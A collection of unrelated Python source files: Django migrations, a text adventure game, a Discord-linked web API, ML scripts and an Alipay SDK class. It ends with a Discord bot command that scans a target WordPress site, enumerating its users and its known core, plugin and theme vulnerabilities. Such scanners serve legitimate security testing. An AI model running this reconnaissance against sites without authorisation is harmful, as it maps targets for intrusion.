tool = Tool(name=request.json['name'],icon=request.json['icon'],href=request.json['href'],categoryid=request.json['categoryid'],subtitle= request.json['subtitle'])
db.session.add(tool)
db.session.commit()
return utils.network.Network.responseCode(utils.network.HttpSuccess, {'tool':tool.as_dict()}, '添加成功')
# 查询所有工具分类
@yshoog.route('/tools/all',methods = ['GET','POST'])
def getToolAll():
try:
tools = Tool.query.all()
except:
return utils.network.Network.responseCode(utils.network.HttpVailateError, None, '服务端出现异常')
else:
toollist = []
for category in tools:
toollist.append(category.as_dict())
return utils.network.Network.responseCode(utils.network.HttpSuccess,{'list':toollist},'查询成功') |
# Generated by Django 3.1.2 on 2020-11-12 03:35
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('article', '0004_paragraphimage_leading'),
]
operations = [
migrations.AddField(
model_name='articleparagraph',
name='carousel_name',
field=models.TextField(default='carousel-default', max_length=30),
),
]
|
# Start adventure at the forest - can go left to the mountain or right to the castle. Which way do you want to go?
# variable choice
# if choice is = input something
# elif the other choice
#print final outcome for choices
import PySimpleGUI as sg
"""
Adventure Game - open and closing windows simultaneously.
Text scroll adventure game
Click "choices" buttons which will open a new window and progress the story.
Window 1 launches (depending on choices) window 2 & 3
Window 2 choices open up 4 & 5
Window 3 choices opens 6 & 7
"""
# functions that contain text/story and buttons for options to the next window
def make_win1():
layout = [[sg.Text('You start your adventure in the forest.\nYou need to get home and it will be dark soon,\ndo you go left to the mountain pass or right to the castle?'), sg.Text(' ', k='-OUTPUT-')],
[sg.Button('Left'), sg.Button('Right'), sg.Button('End')]]
return sg.Window('Window Title', layout, finalize=True)
def make_win2():
layout = [[sg.Text('You end up at the mountian pass. Do you take the path or the off beaten track?')],
[sg.Button('Path'), sg.Button('Track'), sg.Button('End')]]
return sg.Window('Second Window', layout, finalize=True)
def make_win3():
layout = [[sg.Text('Arriving at the castle you are greeted warmly by some friends.\nDo you spend the night or say you must be on your way home?')],
[sg.Button('Go'), sg.Button('Stay'), sg.Button('End')]]
return sg.Window('Second Window', layout, finalize=True)
def make_win4():
layout = [[sg.Text('You feel tired after the long trek but you make it home just in time for dinner.')],
[sg.Button('End')]]
return sg.Window('Second Window', layout, finalize=True)
def make_win5():
layout = [[sg.Text('You end up falling off the mountain to your death.')],
[sg.Button('End')]]
return sg.Window('Second Window', layout, finalize=True)
def make_win6():
layout = [[sg.Text('You get lost on your way and with it getting dark you fear you will never make it home.')],
[sg.Button('End')]]
return sg.Window('Second Window', layout, finalize=True)
def make_win7():
layout = [[sg.Text('You spend a joyous night with your friends. In the morning they offer to give a ride in the carriage home.')],
[sg.Button('End')]]
return sg.Window('Second Window', layout, finalize=True)
def event_loop():
window1, window2 = make_win1(), None # start off with only window 1 open
window3 = None
window4 = None
while True: # The Event Loop
window, event, values = sg.read_all_windows()
if event == sg.WIN_CLOSED or event == 'End':
window.close()
if window == window2: # if closing win 2, mark as closed
window2 = None
elif window == window1: # if closing win 1, exit program
break
# elif events that makes the previous windows close upon selecting a button from the listed functions above
elif event == 'Left' and not window2:
window2 = make_win2()
window = window.close()
elif event == 'Right' and not window2:
window2 = make_win3()
window = window.close()
elif event == 'Path' and not window3:
window3 = make_win4()
window2 = window.close()
elif event == 'Track' and not window3:
window3 = make_win5()
window2 = window.close()
elif event == 'Go' and not window4:
window4 = make_win6()
window2 = window.close()
elif event == 'Stay' and not window4:
window4 = make_win7()
window2 = window.close()
window.close()
# original story Non- GUI code below
def story() :
choice1 = input('You start your adventure in the forest. You need to get home and it will be dark soon, do you go left to the mountain pass or right to the castle? \n Choose Left or Right')
if choice1 == ('Left') :
choice2 = input('You end up at the mountian pass. Do you take the path or the off beaten track? \n Path / Track')
if choice2 == ('Track'):
print('You end up falling off the mountain to your death.')
elif choice2 == ('Path'):
print('You feel tired after the long trek but you make it home just in time for dinner.')
elif choice1 == ('Right'):
choice3 = input('Arriving at the castle you are greeted warmly by some friends. Do you spend the night or say you must be on your way home? \n Stay / Go')
if choice3 == ('Go'):
print('You get lost on your way and with it getting dark you fear you will never make it home.')
elif choice3 ==('Stay'):
print('You spend a joyous night with your friends. In the morning they offer to give a ride in the carriage home.')
if __name__ == "__main__":
# story()
# make_win1()
# make_win2()
event_loop() |
#-------------------------------------------------------------------------------
# Name: 265
# Purpose:
#
# Author: wrongrook
#
def e265_recurse(S,last,N):
if len(S)==N:
return last
last*=2
t=last&(N-1)
s=0
if t not in S:
S.add(t)
s+=e265_recurse(S,last,N)
S.remove(t)
t+=1
if t not in S:
S.add(t)
s+=e265_recurse(S,last+1,N)
S.remove(t)
return s
n = 5
print (e265_recurse(set([0]),0,2**n)/2**(n-1)) |
import os
import aiohttp
from quart import Quart, abort, jsonify, request, session, redirect, url_for, render_template
from quart_discord import DiscordOAuth2Session, requires_authorization, Unauthorized, AccessDenied
from urllib.parse import quote
from alttprbot.tournaments import TOURNAMENT_DATA, fetch_tournament_handler
from alttprbot.tournament.core import UnableToLookupEpisodeException
from alttprbot.alttprgen.mystery import get_weights, generate
from alttprbot.database import league_playoffs, srlnick
from alttprbot_discord.bot import discordbot
sahasrahbotapi = Quart(__name__)
sahasrahbotapi.secret_key = bytes(os.environ.get("APP_SECRET_KEY"), "utf-8")
RACETIME_CLIENT_ID_OAUTH = os.environ.get('RACETIME_CLIENT_ID_OAUTH')
RACETIME_CLIENT_SECRET_OAUTH = os.environ.get('RACETIME_CLIENT_SECRET_OAUTH')
RACETIME_URL = os.environ.get('RACETIME_URL', 'https://racetime.gg')
APP_URL = os.environ.get('APP_URL', 'https://sahasrahbotapi.synack.live')
sahasrahbotapi.config["DISCORD_CLIENT_ID"] = int(os.environ.get("DISCORD_CLIENT_ID"))
sahasrahbotapi.config["DISCORD_CLIENT_SECRET"] = os.environ.get("DISCORD_CLIENT_SECRET")
sahasrahbotapi.config["DISCORD_REDIRECT_URI"] = os.environ.get("APP_URL") + "/callback/discord/"
sahasrahbotapi.config["DISCORD_BOT_TOKEN"] = os.environ.get("DISCORD_TOKEN")
discord = DiscordOAuth2Session(sahasrahbotapi)
@sahasrahbotapi.route("/login/")
async def login():
return await discord.create_session(
scope=[
'identify',
],
data=dict(redirect=session.get("login_original_path", "/me"))
)
@sahasrahbotapi.route("/callback/discord/")
async def callback():
data = await discord.callback()
redirect_to = data.get("redirect", "/me/")
return redirect(redirect_to)
@sahasrahbotapi.errorhandler(Unauthorized)
async def redirect_unauthorized(e):
session['login_original_path'] = request.full_path
return redirect(url_for("login"))
@sahasrahbotapi.errorhandler(AccessDenied)
async def access_denied(e):
return await render_template(
'error.html',
title="Access Denied",
message="We were unable to access your Discord account."
)
@sahasrahbotapi.errorhandler(UnableToLookupEpisodeException)
async def unable_to_lookup(e):
return await render_template(
'error.html',
title="SpeedGaming Episode Not Found",
message="The SpeedGaming Episode ID was not found. Please double check!"
)
@sahasrahbotapi.route("/me/")
@requires_authorization
async def me():
user = await discord.fetch_user()
return await render_template('me.html', logged_in=True, user=user)
@sahasrahbotapi.route("/logout/")
async def logout():
discord.revoke()
return await render_template('logout.html', logged_in=False)
@sahasrahbotapi.route('/api/settingsgen/mystery', methods=['POST'])
async def mysterygen():
weights = await request.get_json()
mystery = await generate(weights=weights, spoilers="mystery")
if mystery.customizer:
endpoint = '/api/customizer'
elif mystery.doors:
endpoint = None
else:
endpoint = '/api/randomizer'
print(mystery.custom_instructions)
return jsonify(
settings=mystery.settings,
customizer=mystery.customizer,
doors=mystery.doors,
endpoint=endpoint
)
@sahasrahbotapi.route('/api/settingsgen/mystery/<string:weightset>', methods=['GET'])
async def mysterygenwithweights(weightset):
weights = await get_weights(weightset)
mystery = await generate(weights=weights, spoilers="mystery")
if mystery.customizer:
endpoint = '/api/customizer'
elif mystery.doors:
endpoint = None
else:
endpoint = '/api/randomizer'
print(mystery.custom_instructions)
return jsonify(
settings=mystery.settings,
customizer=mystery.customizer,
doors=mystery.doors,
endpoint=endpoint
)
@sahasrahbotapi.route("/submit/<string:event>", methods=['GET'])
@requires_authorization
async def submission_form(event):
user = await discord.fetch_user()
episode_id = request.args.get("episode_id", "")
event_config = await TOURNAMENT_DATA[event].get_config()
form_data = event_config.submission_form
if form_data is None:
raise Exception("There is no form submission data for this event.")
return await render_template(
'submission.html',
logged_in=True,
user=user,
event=event,
endpoint=url_for("submit"),
settings_list=form_data,
episode_id=episode_id
)
@sahasrahbotapi.route("/submit", methods=['POST'])
@requires_authorization
async def submit():
user = await discord.fetch_user()
payload = await request.form
tournament_race = await fetch_tournament_handler(payload['event'], int(payload['episodeid']))
await tournament_race.process_submission_form(payload, submitted_by=f"{user.name}#{user.discriminator}")
return await render_template(
"submission_done.html",
logged_in=True,
user=user,
tournament_race=tournament_race
)
@sahasrahbotapi.route('/api/league/playoff/<int:episode_id>', methods=['GET'])
async def get_league_playoff(episode_id):
results = await league_playoffs.get_playoff_by_episodeid_submitted(episode_id)
return jsonify(results)
@sahasrahbotapi.route('/api/league/playoffs', methods=['GET'])
async def get_league_playoffs():
results = await league_playoffs.get_all_playoffs()
return jsonify(results)
@sahasrahbotapi.route('/racetime/verification/initiate', methods=['GET'])
@requires_authorization
async def racetime_init_verification():
redirect_uri = quote(f"{APP_URL}/racetime/verify/return")
return redirect(
f"{RACETIME_URL}/o/authorize?client_id={RACETIME_CLIENT_ID_OAUTH}&response_type=code&scope=read&redirect_uri={redirect_uri}",
)
@sahasrahbotapi.route('/racetime/verify/return', methods=['GET'])
@requires_authorization
async def return_racetime_verify():
user = await discord.fetch_user()
code = request.args.get("code")
if code is None:
return abort(400, "code is missing")
data = {
'client_id': RACETIME_CLIENT_ID_OAUTH,
'client_secret': RACETIME_CLIENT_SECRET_OAUTH,
'code': code,
'grant_type': 'authorization_code',
'scope': 'read',
'redirect_uri': f"{APP_URL}/racetime/verify/return"
}
async with aiohttp.request(url=f"{RACETIME_URL}/o/token", method="post", data=data, raise_for_status=True) as resp:
token_data = await resp.json()
token = token_data['access_token']
headers = {
'Authorization': f'Bearer {token}'
}
async with aiohttp.request(url=f"{RACETIME_URL}/o/userinfo", method="get", headers=headers, raise_for_status=True) as resp:
userinfo_data = await resp.json()
await srlnick.insert_rtgg_id(user.id, userinfo_data['id'])
return await render_template('racetime_verified.html', logged_in=True, user=user, racetime_name=userinfo_data['name'])
@sahasrahbotapi.route('/healthcheck', methods=['GET'])
async def healthcheck():
if discordbot.is_closed():
abort(500, description='Connection to Discord is closed.')
appinfo = await discordbot.application_info()
await discordbot.fetch_user(appinfo.owner.id)
return jsonify(
success=True
)
@sahasrahbotapi.route('/robots.txt', methods=['GET'])
async def robots():
return 'User-agent: *\nDisallow: /\n'
# @sahasrahbotapi.errorhandler(400)
# def bad_request(e):
# return jsonify(success=False, error=repr(e))
# @sahasrahbotapi.errorhandler(404)
# def not_found(e):
# return jsonify(success=False, error=repr(e))
# @sahasrahbotapi.errorhandler(500)
# def something_bad_happened(e):
# return jsonify(success=False, error=repr(e))
|
# import train_helper
# import time
# import os
import helper
# import sys
# import eval_helper
import numpy as np
import tensorflow as tf
import read_cityscapes_tf_records as reader
tf.app.flags.DEFINE_string('config_path', "config/cityscapes.py",
"""Path to experiment config.""")
FLAGS = tf.app.flags.FLAGS
helper.import_module('config', FLAGS.config_path)
print(FLAGS.__dict__['__flags'].keys())
def main(argv=None):
train_data, train_labels, train_names, train_weights = reader.inputs(
shuffle=True, num_epochs=1, dataset_partition='train')
session = tf.Session()
session.run(tf.initialize_local_variables())
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(session=session, coord=coord)
for i in range(1): # WAS
print(i)
labels, weights = session.run([train_labels, train_weights])
l255 = labels[0, labels[0] == 255]
result_sum = 0
for j in range(19):
print('Label {}'.format(j))
lj = labels[0, labels[0] == j]
wj = weights[0, labels[0] == j]
amount = len(lj) / (len(labels[0]))
print(amount)
if len(wj) > 0:
print('Weight ', wj[0])
d = wj[0] * amount
else:
d = 0
result_sum += d
print(result_sum)
coord.request_stop()
coord.join(threads)
session.close()
if __name__ == '__main__':
tf.app.run()
|
# 给定一个由整数组成的非空数组所表示的非负整数,在该数的基础上加一。
#
# 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。
#
# 你可以假设除了整数 0 之外,这个整数不会以零开头。
#
# 示例 1:
#
# 输入: [1,2,3]
# 输出: [1,2,4]
# 解释: 输入数组表示数字 123。
#
#
# 示例 2:
#
# 输入: [4,3,2,1]
# 输出: [4,3,2,2]
# 解释: 输入数组表示数字 4321。
#
# Related Topics 数组
# leetcode submit region begin(Prohibit modification and deletion)
from typing import List
class Solution:
#直接转化为数字加一再转化为数组
# def plusOne(self, digits: List[int]) -> List[int]:
# num = 0
# result = []
# for index, digist in enumerate(digits):
# num = num + digist * 10 ** (len(digits) - index - 1)
# num = num + 1
# while num:
# result_index = num % 10
# num = int(num // int(10))
# result.append(result_index)
# result.reverse()
# return result
def plusOne(self, digits: List[int]) -> List[int]:
l = len(digits)
if l == 0:
return [1]
for i in range (l-1, -1, -1):
if digits[i] != 9:
digits[i] = digits[i]+1
return digits
else:
digits[i] = 0
digits.insert(0, 1) #该方法是python内置方法,运行速度很快
return digits
# leetcode submit region end(Prohibit modification and deletion)
if __name__ == '__main__':
digist = [9]
solution = Solution()
print(solution.plusOne(digist))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
class ZhimaCreditEpCodecCreateRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._channel_id = None
self._channel_name = None
self._goto_url = None
self._subtitle = None
self._title = None
self._content_img = None
self._logo_img = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def channel_id(self):
return self._channel_id
@channel_id.setter
def channel_id(self, value):
self._channel_id = value
@property
def channel_name(self):
return self._channel_name
@channel_name.setter
def channel_name(self, value):
self._channel_name = value
@property
def goto_url(self):
return self._goto_url
@goto_url.setter
def goto_url(self, value):
self._goto_url = value
@property
def subtitle(self):
return self._subtitle
@subtitle.setter
def subtitle(self, value):
self._subtitle = value
@property
def title(self):
return self._title
@title.setter
def title(self, value):
self._title = value
@property
def content_img(self):
return self._content_img
@content_img.setter
def content_img(self, value):
if not isinstance(value, FileItem):
return
self._content_img = value
@property
def logo_img(self):
return self._logo_img
@logo_img.setter
def logo_img(self, value):
if not isinstance(value, FileItem):
return
self._logo_img = value
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'zhima.credit.ep.codec.create'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.channel_id:
if hasattr(self.channel_id, 'to_alipay_dict'):
params['channel_id'] = json.dumps(obj=self.channel_id.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['channel_id'] = self.channel_id
if self.channel_name:
if hasattr(self.channel_name, 'to_alipay_dict'):
params['channel_name'] = json.dumps(obj=self.channel_name.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['channel_name'] = self.channel_name
if self.goto_url:
if hasattr(self.goto_url, 'to_alipay_dict'):
params['goto_url'] = json.dumps(obj=self.goto_url.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['goto_url'] = self.goto_url
if self.subtitle:
if hasattr(self.subtitle, 'to_alipay_dict'):
params['subtitle'] = json.dumps(obj=self.subtitle.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['subtitle'] = self.subtitle
if self.title:
if hasattr(self.title, 'to_alipay_dict'):
params['title'] = json.dumps(obj=self.title.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['title'] = self.title
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
if self.content_img:
multipart_params['content_img'] = self.content_img
if self.logo_img:
multipart_params['logo_img'] = self.logo_img
return multipart_params
|
import os
import pickle
import time
import numpy as np
import tensorflow as tf
import sentencepiece as spm
from model import *
class ChatEngine():
def __init__(self):
self.checkGPU()
self.maxlen = 32
with open('./data/dict.pkl', 'rb') as f:
self.index = pickle.load(f)
self.vocab = {v: k for k, v in self.index.items()}
vocab_size = len(self.vocab) + 1
num_layers = 3
d_model = 64
dff = 256
num_heads = 8
dropout_rate = 0.1
self.transformer = TransformerEX(num_layers, d_model, num_heads, dff,
vocab_size, vocab_size,
pe_input=vocab_size,
pe_target=vocab_size,
rate=dropout_rate
)
learning_rate = CustomSchedule(d_model)
optimizer = tf.keras.optimizers.Adam(learning_rate, beta_1=0.9, beta_2=0.98, epsilon=1e-9)
checkpoint_path = "./models/training_checkpoints/"
ckpt = tf.train.Checkpoint(transformer=self.transformer, optimizer=optimizer)
ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=5)
if ckpt_manager.latest_checkpoint:
ckpt.restore(ckpt_manager.latest_checkpoint).expect_partial()
print ('Latest checkpoint restored!!')
mpath = 'models/sentensepice'
self.sp = spm.SentencePieceProcessor()
self.sp.load(mpath+'.model')
def checkGPU(self):
physical_devices = tf.config.experimental.list_physical_devices('GPU')
if len(physical_devices) > 0:
for k in range(len(physical_devices)):
tf.config.experimental.set_memory_growth(physical_devices[k], True)
print('memory growth:', tf.config.experimental.get_memory_growth(physical_devices[k]))
else:
print("Not enough GPU hardware devices available")
def response(self, sentences):
line1, line2 = sentences[0], sentences[1]
parts1 = self.sp.encode_as_pieces(line1)
parts2 = self.sp.encode_as_pieces(line2)
parts1 = ['<start>'] + parts1 + ['<end>']
parts2 = ['<start>'] + parts2 + ['<end>']
num_parts1 = [self.vocab[part] for part in parts1]
num_parts2 = [self.vocab[part] for part in parts2]
inp1 = np.asarray(num_parts1)
inp2 = np.asarray(num_parts2)
in_sentence1, in_sentence2, ret_sentence = '', '', ''
ret, _ = generate([inp1, inp2], self.vocab, self.maxlen, self.transformer)
for n in ret.numpy():
if n == self.vocab['<end>']: break
ret_sentence += self.index[n]
ret_sentence = ret_sentence.replace('<start>', '').replace('<end>', '')
return ret_sentence
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
__author__ = 'jiaojianfeng'
import types
x = 20
print type(x) is types.IntType
print x.__class__
print x.__class__ is type(x) is int is types.IntType
y = x
print hex(id(x)), hex(id(y)) #id(object) 获取内存地址
print hex(id(int)), hex(id(types.IntType)) |
# Generated by Django 2.2.14 on 2020-12-01 00:38
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('Materias', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Alumno',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('nombre', models.CharField(max_length=100)),
('edad', models.IntegerField()),
('grado', models.CharField(max_length=20)),
('grupo', models.CharField(max_length=10)),
('correo', models.CharField(max_length=200)),
('calificacion', models.IntegerField(null=True)),
('asistencia', models.IntegerField(null=True)),
('clases', models.ManyToManyField(related_name='clases', to='Materias.Asignatura')),
],
),
]
|
##### Message Types ####
C_M_Create = 1
C_M_Read = 2
C_M_Write = 3
C_CS_Write = 4
C_CS_Read = 5
CS_M_Completed = 6
CS_M_Heartbeat = 7
|
def foo(var):
try:
print(var)
# 1 + print(var)
except:
1 + print('Why do you print me?') + 1
else:
1 + print('Why do you print me?') + 1
finally:
return
print(foo("Hello"))
"""
>> Why do you print me?
no raise of errors
"""
|
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 9 19:20:11 2015
@author: A30123
"""
######################################
#alternative code for retrieving variable values
def read_single_variable_as_float_csv(csvpathfilename, variablename):
import csv
import numpy as np
notfirst=1
thelist=[]
with open(csvpathfilename,'rU') as csvfile:
contents=csv.reader(csvfile)
for row in contents:
if notfirst==1:
whichcolumn=row.index(variablename)
notfirst+=1
else:
thelist.append(float(row[(whichcolumn)]))
return np.array(thelist)
######################################
########example##########################################################
StepLabelList=read_single_variable_as_float_csv("E://TMAlgroup//setpoint//run1032_6 inch Si.SL.AlN_SLs Buffer_Si_017-4_6 inch Si.SL.AlN_SLs Buffer_Si_017-4_1046-setpoint.csv","StepLabel")
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
from typing import Any, AsyncIterator
from airflow.providers.apache.beam.hooks.beam import BeamAsyncHook
from airflow.triggers.base import BaseTrigger, TriggerEvent
class BeamPipelineTrigger(BaseTrigger):
"""
Trigger to perform checking the pipeline status until it reaches terminate state.
:param variables: Variables passed to the pipeline.
:param py_file: Path to the python file to execute.
:param py_options: Additional options.
:param py_interpreter: Python version of the Apache Beam pipeline. If `None`, this defaults to the
python3. To track python versions supported by beam and related issues
check: https://issues.apache.org/jira/browse/BEAM-1251
:param py_requirements: Additional python package(s) to install.
If a value is passed to this parameter, a new virtual environment has been created with
additional packages installed.
You could also install the apache-beam package if it is not installed on your system, or you want
to use a different version.
:param py_system_site_packages: Whether to include system_site_packages in your virtualenv.
See virtualenv documentation for more information.
This option is only relevant if the ``py_requirements`` parameter is not None.
:param runner: Runner on which pipeline will be run. By default, "DirectRunner" is being used.
Other possible options: DataflowRunner, SparkRunner, FlinkRunner, PortableRunner.
See: :class:`~providers.apache.beam.hooks.beam.BeamRunnerType`
See: https://beam.apache.org/documentation/runners/capability-matrix/
"""
def __init__(
self,
variables: dict,
py_file: str,
py_options: list[str] | None = None,
py_interpreter: str = "python3",
py_requirements: list[str] | None = None,
py_system_site_packages: bool = False,
runner: str = "DirectRunner",
):
super().__init__()
self.variables = variables
self.py_file = py_file
self.py_options = py_options
self.py_interpreter = py_interpreter
self.py_requirements = py_requirements
self.py_system_site_packages = py_system_site_packages
self.runner = runner
def serialize(self) -> tuple[str, dict[str, Any]]:
"""Serialize BeamPipelineTrigger arguments and classpath."""
return (
"airflow.providers.apache.beam.triggers.beam.BeamPipelineTrigger",
{
"variables": self.variables,
"py_file": self.py_file,
"py_options": self.py_options,
"py_interpreter": self.py_interpreter,
"py_requirements": self.py_requirements,
"py_system_site_packages": self.py_system_site_packages,
"runner": self.runner,
},
)
async def run(self) -> AsyncIterator[TriggerEvent]: # type: ignore[override]
"""Get current pipeline status and yields a TriggerEvent."""
hook = self._get_async_hook()
try:
return_code = await hook.start_python_pipeline_async(
variables=self.variables,
py_file=self.py_file,
py_options=self.py_options,
py_interpreter=self.py_interpreter,
py_requirements=self.py_requirements,
py_system_site_packages=self.py_system_site_packages,
)
except Exception as e:
self.log.exception("Exception occurred while checking for pipeline state")
yield TriggerEvent({"status": "error", "message": str(e)})
else:
if return_code == 0:
yield TriggerEvent(
{
"status": "success",
"message": "Pipeline has finished SUCCESSFULLY",
}
)
else:
yield TriggerEvent({"status": "error", "message": "Operation failed"})
return
def _get_async_hook(self) -> BeamAsyncHook:
return BeamAsyncHook(runner=self.runner)
|
import json
import re
import discord
import os
import requests
from lxml import etree
from random import randint
from secret import utils
async def on_message(message, secret_context):
parts = message.content.split(" ")
if len(parts) < 2:
# print the help
secret_context.bus.emit('secret_command', command='!help wpscan')
else:
if parts[1] == 'update':
await update_vuln_db(message, secret_context)
else:
if not os.path.exists('secret/api/wordpress'):
await update_vuln_db(message, secret_context)
user_agent = get_random_agent()
target = parts[1]
if target[-1] != '/':
target = target + '/'
index = requests.get(target, headers={"User-Agent": user_agent}, verify=False)
if "wp-" not in index.text:
embed = utils.simple_embed('**%s**' % target, 'does not appear to be powered by wordpress',
discord.Color.red())
await secret_context.discord_client.send_message(message.channel, embed=embed)
else:
version = await check_version(target, user_agent, index)
embed = utils.simple_embed('**%s**' % target, 'wordpress version found: **%s**' % version,
discord.Color.green())
await secret_context.discord_client.send_message(message.channel, embed=embed)
await check_backup_files(message, secret_context, target, user_agent)
await check_xml_rpc(message, secret_context, target, user_agent)
await check_directory_listing(message, secret_context, target, user_agent)
await check_robots(message, secret_context, target, user_agent)
await full_path_disclose(message, secret_context, target, user_agent)
await enumerate_users(message, secret_context, target, user_agent)
if version is not None:
await list_wp_version_vuln(message, secret_context, target, version)
await enumerate_plugins(message, secret_context, index)
await enumerate_themes(message, secret_context, index)
async def enumerate_themes(message, secret_context, index):
regex = re.compile('wp-content/themes/(.*?)/.*?[css|js].*?ver=([0-9\.]*)')
match = regex.findall(index.text)
theme = {}
for m in match:
theme_name = m[0]
theme_name = theme_name.replace('-master', '')
theme_name = theme_name.replace('.min', '')
theme_version = m[1]
if m[0] not in theme.keys():
theme[m[0]] = m[1]
with open('secret/api/wordpress/themes.json') as data_file:
data = json.load(data_file)
embed = utils.simple_embed(theme_name, theme_version,
utils.random_color())
if theme_name in data.keys():
if is_lower(theme_version, data[theme_name]['latest_version'], False):
embed.add_field(name='latest version', value=data[theme_name]['latest_version'], inline=False)
for vuln in data[theme_name]['vulnerabilities']:
if 'fixed_in' in vuln.keys() and (vuln['fixed_in'] is None or
is_lower(theme_version, vuln['fixed_in'], True)):
embed.add_field(name=vuln['vuln_type'] + ' | ' + vuln['title'] + ' (' + vuln['id'] + ')',
value="fixed in %s" % vuln['fixed_in'], inline=False)
for ref_key in vuln['references'].keys():
for ref in vuln['references'][ref_key]:
if ref_key != 'url':
embed.add_field(name='reference', value=ref_key.capitalize() + ' - ' + ref)
else:
embed.add_field(name='reference', value=ref)
await secret_context.discord_client.send_message(message.channel, embed=embed)
async def enumerate_plugins(message, secret_context, index):
regex = re.compile('wp-content/plugins/(.*?)/.*?[css|js].*?ver=([0-9\.]*)')
match = regex.findall(index.text)
plugin = {}
for m in match:
plugin_name = m[0]
plugin_name = plugin_name.replace('-master', '')
plugin_name = plugin_name.replace('.min', '')
plugin_version = m[1]
if plugin_name not in plugin.keys() and m[1] != '1':
plugin[plugin_name] = m[1]
with open('secret/api/wordpress/plugins.json') as data_file:
data = json.load(data_file)
embed = utils.simple_embed(plugin_name, plugin_version,
utils.random_color())
if plugin_name in data.keys():
if is_lower(plugin_version, data[plugin_name]['latest_version'], False):
embed.add_field(name='latest version', value=data[plugin_name]['latest_version'], inline=False)
for vuln in data[plugin_name]['vulnerabilities']:
if 'fixed_in' in vuln.keys() and (vuln['fixed_in'] is None or
is_lower(plugin_version, vuln['fixed_in'], True)):
embed.add_field(name=vuln['vuln_type'] + ' | ' + vuln['title'] + ' (' + vuln['id'] + ')',
value="fixed in %s" % vuln['fixed_in'], inline=False)
for ref_key in vuln['references'].keys():
for ref in vuln['references'][ref_key]:
if ref_key != 'url':
embed.add_field(name='reference', value=ref_key.capitalize() + ' - ' + ref)
else:
embed.add_field(name='reference', value=ref)
await secret_context.discord_client.send_message(message.channel, embed=embed)
async def list_wp_version_vuln(message, secret_context, target, version):
# Load json file
with open('secret/api/wordpress/wordpresses.json') as data_file:
data = json.load(data_file)
if version not in data:
embed = utils.simple_embed('**%s**' % target,
'wordpress version not in db. update wordpress vuln db and try again',
discord.Color.red())
await secret_context.discord_client.send_message(message.channel, embed=embed)
if not data[version]["vulnerabilities"]:
versions = data.keys()
for v in versions:
if v[:4] in version and is_lower(version, v, False):
version = v
embed = utils.simple_embed('**%s**' % target,
'wordpress core vulnerabilities',
discord.Color.green())
for vuln in data[version]["vulnerabilities"]:
embed.add_field(name=vuln['vuln_type'], value=vuln['title'] + ' - ' + vuln['id'], inline=False)
for ref_key in vuln['references'].keys():
for ref in vuln['references'][ref_key]:
if ref_key != 'url':
embed.add_field(name='reference', value=ref_key.capitalize() + ' - ' + ref)
else:
embed.add_field(name='reference', value=ref)
await secret_context.discord_client.send_message(message.channel, embed=embed)
async def enumerate_users(message, secret_context, target, user_agent):
r = requests.get(target + "wp-json/wp/v2/users", headers={"User-Agent": user_agent}, verify=False)
if "200" in str(r):
embed = utils.simple_embed('**%s**' % target, 'enumerated users', discord.Color.green())
users = json.loads(r.text)
for user in users:
embed.add_field(name=user['name'] + " - " + user['slug'], value=user['id'])
await secret_context.discord_client.send_message(message.channel, embed=embed)
